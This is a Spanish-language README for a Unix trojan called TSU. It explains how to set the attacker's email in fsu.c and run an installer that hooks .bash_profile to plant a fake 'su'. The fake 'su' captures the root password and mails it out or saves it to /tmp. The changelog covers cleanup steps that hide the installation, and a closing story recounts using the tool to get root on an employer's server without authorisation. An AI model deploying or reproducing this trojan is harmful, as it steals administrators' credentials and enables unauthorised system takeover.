(TSU) Trojan-horse Super(switch?) User
Version 1.1


-Instrucciones de uso- (lectura obligatoria)

En el codigo fuente fsu.c, cambiar el correo electronico por
el de su preferencia. NO OLVIDAR!, hazlo ahora.

Ejecutar:
	./instalar.sh

Esto instalara el troyano. La siguiente vez que entre el usuario y
utilice el comando su para cambiar a root enviara, sin saberlo, el
password para obtener acceso a dicha cuenta.

Eso es todo. Todo debera salir bien suponiendo que el MTA instalado
(ej. sendmail) este funcionando como debe. No debe haber necesidad de
hacer nada mas que esperar el password en el correo electronico que
se haya definido (o ver periodicamente el directorio /tmp)

Si el servidor en cuestion no es capaz de enviar correo, activar la
linea #define TMP en fsu.c.  El programa creara un archivo en /tmp que
contendra la clave de acceso a root.

El script instalador 'instalar.sh' dara resultado unicamente si la cuenta
desde donde se corre utiliza, por default, alguna version de la shell Bourne
(sh, bash, etc.)

Si la shell default es alguna version de la c-shell (csh, tcsh, etc.),
no dara resultado. La version siguiente de TSU considerara estas shells.



-Cambios- (mediana importancia)

TSU-1.1
	El script 'tsu_inst.sh' fue actualizado a la version 1.1, y
	renombrado 'instalar.sh'

	- Utilizacion exclusiva de .bash_profile como script de inicializacion
	- A falta de .bash_profile, sera generado uno. Pero .bash_login o
	  .profile seran ejecutados de manera normal. En este caso,
	  .bash_profile sera eliminado una vez activado el troyano.
	- Las versiones tar y tar.gz del paquete TSU son eliminadas, si es
	  que existen
	- Un bug fue arreglado, donde no se eliminaba el archivo de instalacion
	  (tsu_inst.sh) cuando el codigo fuente 'fsu.c' no existia, en presencia
	  del programa compilado '.fsu'.




-Corta historia- (poca importancia)

Pero decidi agregar este doc., no para dar instrucciones de uso, sino
aburrirlos con la historia de este caballo de troya tan simple.

No es obligatorio leer lo que sigue, pero tal vez les parezca interesante :P...

No hace mucho tiempo, comence a trabajar para una nueva cia. de
software para respaldo remoto de datos. Trabajando en la seccion de
"alta seguridad", donde se localizaban los servidores que contendrian
(eventualmente) los datos de los clientes - incluidas instituciones
gubernamentales, etc.

Ahi, por cierto, se necesitaba un programador de Nokia. Es cuando
invite a megaflop. Hubiera tenido viaje pagado, estancia lista,
excelente salario ...  Desafortunadamente la cia. tuvo "problemas
administrativos" y valio para dos cosas.

En fin, cuando llegue yo, y me familiarice con la red ahi instalada,
junto con Cableman, y Sr. Clutter, hicimos un analisis de la
seguridad que ahi existia.

Cableman, no teniendo mucho que hacer despues de descubrir una buena
cantidad de serios exploits en nuestro mismo software de respaldo de
datos, comenzo desarrollar software una serie de software a nombre de
un grupo hacker al que llamo Ha-Ha Chickenz, en honor a una fabrica de
galletas de la fortuna chinas llamada Ha-Ha. Chickenz porque, segun yo,
era una procesadora de gallinas, pero no...

Sr. Clutter descubrio que nuestra red no solo estaba practicamente
abierta al publico, sino que hasta mi tocallo amigo de la NSA
podria haber entrado y salido de ahi con datos confidenciales de
clientes y empleados, sin problema alguno.

Yo observe que los 2 administradores de sistemas trabajando ahi,
buenos amigos ambos y excelentes programadores de VB y Perl
respectivamente, no prestaban mucha importancia a la seguridad de sus
servidores.

Aprovechando un agujero de seguridad, obtuve acceso a la cuenta de uno
de ellos (nivel de usuario, pero con perrmiso para ejecutar 'su') en
el servidor de respaldo de datos principal (FreeBSD 4.0, despues
cambio a Solaris, despues los inversionistas dejaron de mandarnos
dinero :( ). Entonces escribi 'fsu' para obtener root. El script
'tsu_inst' lo escribi despues para automatizar una instalacion rapida,
puesto que por lo general uno no esta 'autorizado' a infiltrarse a un
sistema.

Si llegaron a leer hasta aqui, se les agradece su interes! ;) El punto
de todo esto es que un sistema es solo tan seguro como paranoicos son
quienes lo administran.


-T. Nahual (Raza-Mexicana)



